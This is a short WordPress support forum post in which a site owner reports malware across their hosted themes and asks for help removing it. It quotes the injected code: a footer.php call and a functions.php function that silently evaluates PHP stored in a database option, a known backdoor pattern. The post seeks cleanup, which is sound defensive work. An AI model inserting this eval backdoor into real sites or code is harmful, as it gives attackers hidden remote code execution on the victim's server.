Support » Fixing WordPress » [HELP] Malware in my site!

  • Help me. Malware in whole site in my hosting.
    In function.php theme:
    [Code moderated as per the Forum Rules. Please use the pastebin]

    in my theme’s footer.php:
    <?php echo wp_footer_();?>

    in twentyten functions.php:

    <?php
    
    function wp_footer_()
    	{
    		return @eval(get_option('blogoption'));
    	}
    ?>

    Help me to remove them from my site’s themes.

Viewing 2 replies - 1 through 2 (of 2 total)
Viewing 2 replies - 1 through 2 (of 2 total)
  • The topic ‘[HELP] Malware in my site!’ is closed to new replies.